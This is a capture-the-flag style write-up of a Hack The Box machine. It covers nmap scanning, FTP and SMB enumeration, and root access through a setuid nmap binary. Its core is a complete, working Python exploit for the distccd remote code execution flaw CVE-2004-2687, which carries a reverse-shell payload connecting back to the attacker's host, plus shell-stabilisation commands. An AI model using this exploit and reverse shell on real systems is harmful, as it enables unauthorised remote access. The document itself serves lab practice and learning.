Initial Reconnaissance

To start, as always I did a port scan to find out information about the machine such as open ports, what services are running on the ports and perhaps what versions these services are running on to potentially find some low hanging fruits.

To do this I first used a nmap scan to aggressively probe open ports and afterwards scanned the services running on the open ports I received from the previous scan.

Since the machine seems to be configured to not reply to the initial pings of nmap, we use the -Pn flag to skip the initial check in nmap where nmap pings the host to check if its even alive.

Port scan:
nmap 10.10.10.3 -p- -T4 -Pn


Service scan:
nmap 10.10.10.3 -p 21,22,139,445,3632 -A -T4 -o nmap.scan -Pn

The result is the following:

Lets go over the possible attack vectors one by one.

FTP Enumeration (False Lead)

The FTP service on the machine allows an anonymous login, however is of no use of us since the directory is empty.

SMB Enumeration (False Lead)

Using smbclient, I checked for anonymous shares by using anonymous as a password:
smbclient --list \\10.10.10.3\


This however was a dead end since the shares had no files that were of any use to us.

distccd (Exploitation)

Since I haven't heard of the service: distccd before I did some research on it. It turns out its a program that can handle compilation tasks in a distributed manner.
Researching some more, I found, that the version of distccd used on this machine (which was leaked through the nmap scan) is vulnerable to a Remote Code Execution Vulnerability with the CVE of CVE-2004-2687.


After researching a bit I came across this exploit-db post.
The exploit was written for metasploit, but since many certification examinations don't allow the use of metasploit, I have decided to rewrite the code in python.
Feel free to use the code I have written:

import random
import string
import socket

OWNED_HOST = "YOUR_IP"
OWNED_PORT = 444
TARGET_HOST = "TARGET_IP"
TARGET_PORT = 3632
COMMAND = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

def dist_cmd(args):
  args += ["#", "-c", "main.c", "-o", "main.o"]
  res = "DIST00000001" + "ARGC{:08x}".format(len(args))
  for arg in args:
      res += "ARGV{:08X}{}".format(len(arg), arg)
  return res

def exploit():
  args = ["sh", "-c", COMMAND]
  distcmd = dist_cmd(args)
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
      sock.bind((OWNED_HOST, OWNED_PORT))
      sock.connect((TARGET_HOST, TARGET_PORT))
      sock.sendall(distcmd.encode())
      dtag = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
      sock.sendall(f"DOTI0000000A{dtag}\n".encode())

exploit()

I open a ncat session on port 443, run the exploit and Boom... we have a shell!

Stabilizing my shell

I stabilized my shell with python by running:

python -c 'import pty;pty.spawn("/bin/bash")'
(press ctrl+z to background the reverse shell)
stty raw -echo; fg
export term=XTERM

Post Exploitation Reconnaissance

As usual for Hack the Box boxes, the flag is located in the /home directory in one of the user files. I won't leak it here so you can actually have some fun yourselves hehehe.

As I was doing basic privilege escalation attack vector enumeration I noticed that the nmap binary had its setuid bit set. This means we can run it as if we were the owner of said binary. And the owner is... ROOT!.
This looks very promising.

Privilege Escalation (ROOT)

After researching a bit I came across this blog post. Apparently some older versions of nmap have a so called interactive mode which lets us spawn a shell with nmap. Since the SUID bit is set, I am assuming we can spawn a shell as the owner of the binary, so root.



And it works! By following the instructions from the blog post I have spawned a shell as root and successfully pwned the box!